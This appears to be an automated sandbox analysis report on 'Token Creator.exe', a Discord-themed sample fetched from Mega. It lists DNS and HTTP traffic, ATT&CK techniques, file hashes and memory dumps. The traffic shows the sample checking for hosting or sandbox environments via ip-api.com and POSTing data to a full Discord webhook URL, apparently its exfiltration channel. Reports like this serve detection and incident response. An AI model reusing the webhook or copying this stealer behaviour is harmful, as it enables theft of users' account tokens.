https://gfs208n104.userstorage.mega.co.nz/dl/vC_wKJ4ln1aOPgIIAvdcD_Fpv6UX9j5f7i-hQf9Z8L__cTWyyo0orDtRGtYwCnoym1i-25k-IgMdtKXyXZaqBsM01EypG6ocHhWZuPIGhscjHJd3HX_ZfIBUBZpkVw/0-131071

tls, http

msedge.exe

4.1kB
140.8kB
56
106

HTTP Request

POST https://gfs208n104.userstorage.mega.co.nz/dl/vC_wKJ4ln1aOPgIIAvdcD_Fpv6UX9j5f7i-hQf9Z8L__cTWyyo0orDtRGtYwCnoym1i-25k-IgMdtKXyXZaqBsM01EypG6ocHhWZuPIGhscjHJd3HX_ZfIBUBZpkVw/0-131071

HTTP Response

200
185.206.26.14:443

https://gfs208n104.userstorage.mega.co.nz/dl/vC_wKJ4ln1aOPgIIAvdcD_Fpv6UX9j5f7i-hQf9Z8L__cTWyyo0orDtRGtYwCnoym1i-25k-IgMdtKXyXZaqBsM01EypG6ocHhWZuPIGhscjHJd3HX_ZfIBUBZpkVw/131072-168058

tls, http

msedge.exe

2.4kB
43.8kB
19
36

HTTP Request

POST https://gfs208n104.userstorage.mega.co.nz/dl/vC_wKJ4ln1aOPgIIAvdcD_Fpv6UX9j5f7i-hQf9Z8L__cTWyyo0orDtRGtYwCnoym1i-25k-IgMdtKXyXZaqBsM01EypG6ocHhWZuPIGhscjHJd3HX_ZfIBUBZpkVw/131072-168058

HTTP Response

200
142.250.74.227:443

https://gstatic.com/generate_204

tls, http

Token Creator.exe

724 B
4.9kB
8
8

HTTP Request

GET https://gstatic.com/generate_204

HTTP Response

204
208.95.112.1:80

http://ip-api.com/line/?fields=hosting

http

Token Creator.exe

310 B
267 B
5
2

HTTP Request

GET http://ip-api.com/line/?fields=hosting

HTTP Response

200
208.95.112.1:80

http://ip-api.com/json/?fields=225545

http

Token Creator.exe

285 B
512 B
5
4

HTTP Request

GET http://ip-api.com/json/?fields=225545

HTTP Response

200
162.159.138.232:443

https://discord.com/api/webhooks/1275875655388631121/GOJlkEk8aOO38GLqQLPI8bq6mzjW5J-lb9x4jd_m5dhdh_Y7qsx5YMoq8Z92UhSeiMns

tls, http

Token Creator.exe

84.0kB
6.9kB
70
36

HTTP Request

POST https://discord.com/api/webhooks/1275875655388631121/GOJlkEk8aOO38GLqQLPI8bq6mzjW5J-lb9x4jd_m5dhdh_Y7qsx5YMoq8Z92UhSeiMns

HTTP Response

404

HTTP Request

POST https://discord.com/api/webhooks/1275875655388631121/GOJlkEk8aOO38GLqQLPI8bq6mzjW5J-lb9x4jd_m5dhdh_Y7qsx5YMoq8Z92UhSeiMns

HTTP Response

404

8.8.8.8:53

8.8.8.8.in-addr.arpa

dns

66 B
90 B
1
1

DNS Request

8.8.8.8.in-addr.arpa
8.8.8.8:53

209.205.72.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

209.205.72.20.in-addr.arpa
8.8.8.8:53

mega.nz

dns

msedge.exe

53 B
85 B
1
1

DNS Request

mega.nz

DNS Response

31.216.145.5

31.216.144.5
8.8.8.8:53

eu.static.mega.co.nz

dns

msedge.exe

66 B
130 B
1
1

DNS Request

eu.static.mega.co.nz

DNS Response

66.203.127.11

66.203.127.13

89.44.169.134

66.203.124.37
8.8.8.8:53

5.145.216.31.in-addr.arpa

dns

71 B
110 B
1
1

DNS Request

5.145.216.31.in-addr.arpa
8.8.8.8:53

88.210.23.2.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

88.210.23.2.in-addr.arpa
8.8.8.8:53

68.159.190.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

68.159.190.20.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

11.127.203.66.in-addr.arpa

dns

72 B
135 B
1
1

DNS Request

11.127.203.66.in-addr.arpa
8.8.8.8:53

g.api.mega.co.nz

dns

msedge.exe

62 B
175 B
1
1

DNS Request

g.api.mega.co.nz

DNS Response

66.203.125.14

66.203.125.12

66.203.125.16

66.203.125.15

66.203.125.11

66.203.125.13
8.8.8.8:53

14.125.203.66.in-addr.arpa

dns

72 B
104 B
1
1

DNS Request

14.125.203.66.in-addr.arpa
224.0.0.251:5353

709 B
11
8.8.8.8:53

gfs208n104.userstorage.mega.co.nz

dns

msedge.exe

79 B
95 B
1
1

DNS Request

gfs208n104.userstorage.mega.co.nz

DNS Response

185.206.26.14
8.8.8.8:53

14.26.206.185.in-addr.arpa

dns

72 B
135 B
1
1

DNS Request

14.26.206.185.in-addr.arpa
8.8.8.8:53

gstatic.com

dns

Token Creator.exe

57 B
73 B
1
1

DNS Request

gstatic.com

DNS Response

142.250.74.227
8.8.8.8:53

13.86.106.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

13.86.106.20.in-addr.arpa
8.8.8.8:53

ip-api.com

dns

Token Creator.exe

56 B
72 B
1
1

DNS Request

ip-api.com

DNS Response

208.95.112.1
8.8.8.8:53

227.74.250.142.in-addr.arpa

dns

73 B
111 B
1
1

DNS Request

227.74.250.142.in-addr.arpa
8.8.8.8:53

1.112.95.208.in-addr.arpa

dns

71 B
95 B
1
1

DNS Request

1.112.95.208.in-addr.arpa
8.8.8.8:53

discord.com

dns

Token Creator.exe

57 B
137 B
1
1

DNS Request

discord.com

DNS Response

162.159.138.232

162.159.137.232

162.159.135.232

162.159.128.233

162.159.136.232
8.8.8.8:53

232.138.159.162.in-addr.arpa

dns

74 B
136 B
1
1

DNS Request

232.138.159.162.in-addr.arpa
8.8.8.8:53

53.210.109.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

53.210.109.20.in-addr.arpa
8.8.8.8:53

18.31.95.13.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

18.31.95.13.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
85ba073d7015b6ce7da19235a275f6da

SHA1
a23c8c2125e45a0788bac14423ae1f3eab92cf00

SHA256
5ad04b8c19bf43b550ad725202f79086168ecccabe791100fba203d9aa27e617

SHA512
eb4fd72d7030ea1a25af2b59769b671a5760735fb95d18145f036a8d9e6f42c903b34a7e606046c740c644fab0bb9f5b7335c1869b098f121579e71f10f5a9c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
7de1bbdc1f9cf1a58ae1de4951ce8cb9

SHA1
010da169e15457c25bd80ef02d76a940c1210301

SHA256
6e390bbc0d03a652516705775e8e9a7b7936312a8a5bea407f9d7d9fa99d957e

SHA512
e4a33f2128883e71ab41e803e8b55d0ac17cbc51be3bde42bed157df24f10f34ad264f74ef3254dbe30d253aca03158fde21518c2b78aaa05dae8308b1c5f30c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
72B

MD5
2018026a7abd6d472b1aa417ae862096

SHA1
12e4363946bfdda26363dea417e69e490e61152d

SHA256
c8334f30975c2be3a5ae9dd477d80e4073834876e1e5d8416fa2ce6ee21fe22f

SHA512
e5ac37b592287d33424b7747a74208bcd972de7fa83c5cf8baa2cede67acf535dca4c289fd36e4b95c969fc8126d8b9afda1f584781fd96779ed1cdd261d1c3a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_mega.nz_0.indexeddb.leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

Filesize
105B

MD5
66f8dd72513b99b659f5e96ad284fa79

SHA1
7b366941103b7ea4d48cc4938b8fcbd4533a7bd4

SHA256
6bf4fb19d63e66a4f6dba1efd2439bc73ca21670030550a5682b323fdcac2176

SHA512
aa7710ad8714c96f975645acd0cf2a9613b320210ba3457039f85f1291af965c1e5fbe63f85576eaf36e3aed652f9c385b5a188565d4bb18f3e1b42f6e4d44a0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
98da6f47fefa83f70a985e60c3256bfb

SHA1
ff6b7a2289105fbf18043c41844d295215651e92

SHA256
b29b2c0c453c8ba6cb115e8682d678ae2e143c65049d4df2b3938a5bb232934d

SHA512
2d0fe9eca9a3acc8aaff45305fa4b9393ae8eafa4ac1cd3b06c5d8fbc971f23a5640c8622201e671bc977b5c91b27ae60c971a343e73be19d46dfe1974188ec1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
951b1beb67f5962557010f1bc3f656dc

SHA1
97464b997e735e929f7eb5b365258b7fa41b8d43

SHA256
a7625e9f0c525742238d42b7590363e777da1c79e3e6d1508c5ce82abd71b770

SHA512
557acf8dcd9ec10d1738c18aeee477701b6f008f255ff1a50b685e0a7885628b2d0ec7e7db8426eb2f57b6b8cd39f8dc76712394f40cd642aeb028586278748a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
1582f32ae91a24bfd41f7ad903c39767

SHA1
4673ba3d305f62cfc28215fcecda761797ddb7fe

SHA256
034b54389c38b2f6fe0d75fb92882940fd13e89700651a0b99cf2594913e67f6

SHA512
2052f8a5e20bdbd1929667152f5de34f67f7afc6fa6d3418b421fb2ef03e2540e671f4cc47260dc9e725a150430b90cb08c99cde96e66ba3f90f39ce4e479ee2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
72B

MD5
dce97f18728d29255093b2fc4aead5d1

SHA1
50c64d249b9b5e51abcdebb7de30fd8b9ef0dc2b

SHA256
1e51cd3d1596fc5057631f9615cc11233764b2f71cb46906647da5e8c974a46b

SHA512
e762540e58683b4965998c12052f11673db41398cc29be5c074f023d0deac2d1709bb95a6b16b44226e10bbb6239c20c62c2c80dbd016cf60ea9c3fe32708596

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe582fa6.TMP

Filesize
48B

MD5
263a7ea5e4bcf252459bca6890848bc0

SHA1
51e457402e1062ad73b3ac02ed28641fa50b369b

SHA256
be18a285dedaf1e18a2ee5a7698c4771d3b409b817b88cb3108fba4fa6c97af2

SHA512
f32c110f34e352f25d1f6b2f1d2a8cb4880a99fd8d2200210484446b0c6acbaa25a63eeb7b6a9abcb6d70f56d8f18d0cd0af9caae315dd584b9ab0bc00cc341e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
d3f908c8272cfd9895e77c5d4ea331b9

SHA1
3b8bd150d4b1cecf935a7c8a2c7b2975c7e47b40

SHA256
d0b18e733f10c112b46213c40474df9d3b2c323390b9449ebb165bbc35245ea1

SHA512
6582f84711bb2a9dd7521752f7df602d7e53d94f2d68086c8e2e6ffc88a728d625f9330fb23e05309fe9cbce230d7144c1d99aa0bf3e615d6a8077fa48b6f220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
65d8154eddac13e86172e89761a962e0

SHA1
842e03efce239bf3fc1e98ea2493132ac8f2da0e

SHA256
d10be657db38946e2aa4d048f7939c934d34cb2f66dcf697aeaef88290d896a4

SHA512
32727b905d6ec79e599a092f713c380d9ad5a09975a64b5b0d3e59b012e0660a91e6add74cdbabcbc796bf2e519ce7303c5f3783355589ed516cd3ee25eae76d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d42b6da621e8df5674e26b799c8e2aa

SHA1
ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

SHA256
5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

SHA512
53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
17d8127be94d3c1b6fcc9a4ed585003e

SHA1
789874fcc7c778c723f3e89822d8cc8750c6c4c8

SHA256
ea357ad1f95863b3618d31e5b0f90495331f64de2b784d9e185b48668c937a7b

SHA512
bb18b6d07d82227f5cfbe3eb460df79ec892c560ad2964dcd4782aa26336ae15059843bf46a739bdd4a4daa58057f99102531a756a1cf434ce6449b3cd35a98e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
276798eeb29a49dc6e199768bc9c2e71

SHA1
5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

SHA256
cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

SHA512
0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
401e2433ba6338e47aa49b1d254fae92

SHA1
ccde8ccf7ab162f2c286b0fade504b794bf9e48e

SHA256
7f511887994094051fafd009ae9b8974f7ae5ec28306ed6aa4ec54dadfd12b55

SHA512
e5fed80d17b8afaad388634863d7c64730949c462b59027bca8f6a80113895a00c135557ffcb1f3a3e7f11734ee257a05c4c69482334b372e2cbc66c4c43669d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fbt4g2yf.dtl.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Downloads\Token Creator Discord.zip

Filesize
164KB

MD5
770ae61f4f5570d336e53a8a7aae65da

SHA1
7c1c40086bee324e5c26ebc02b448434c6c29f25

SHA256
ee4f27aa95ac5baa097af4e4cf9fd7358d841ccb0f200cf168e39724f6cf2e5c

SHA512
341e8e9e7afdb8f21c2fd573ba38838f56c93adaf792704724850d88c53409cc314fb53ee6b2c473a59d20317bb976650661a5c784336fab0e2f7c03321be83f

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
2KB

MD5
4028457913f9d08b06137643fe3e01bc

SHA1
a5cb3f12beaea8194a2d3d83a62bdb8d558f5f14

SHA256
289d433902418aaf62e7b96b215ece04fcbcef2457daf90f46837a4d5090da58

SHA512
c8e1eef90618341bbde885fd126ece2b1911ca99d20d82f62985869ba457553b4c2bf1e841fd06dacbf27275b3b0940e5a794e1b1db0fd56440a96592362c28b

Download Submit
memory/5228-224-0x000001D96B980000-0x000001D96B9F6000-memory.dmp

Filesize
472KB

Download
memory/5228-226-0x000001D96BA00000-0x000001D96BA50000-memory.dmp

Filesize
320KB

Download
memory/5228-228-0x000001D96B900000-0x000001D96B91E000-memory.dmp

Filesize
120KB

Download
memory/5228-265-0x000001D96B920000-0x000001D96B92A000-memory.dmp

Filesize
40KB

Download
memory/5228-266-0x000001D96BB50000-0x000001D96BB62000-memory.dmp

Filesize
72KB

Download
memory/5228-196-0x000001D969230000-0x000001D969270000-memory.dmp

Filesize
256KB

Download
memory/5572-202-0x000002557E010000-0x000002557E032000-memory.dmp

Filesize
136KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Request

HTTP Response

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Request

HTTP Response

HTTP Response

HTTP Request

HTTP Request

HTTP Response

HTTP Response

HTTP Request

HTTP Request

HTTP Response

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Request

HTTP Response

HTTP Response

HTTP Request

HTTP Request

HTTP Response

HTTP Response

HTTP Request

HTTP Request

HTTP Response

HTTP Response

HTTP Request

HTTP Request

HTTP Response

HTTP Response

HTTP Request

HTTP Request

HTTP Response

HTTP Response

HTTP Request

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Response

HTTP Request

HTTP Request

HTTP Response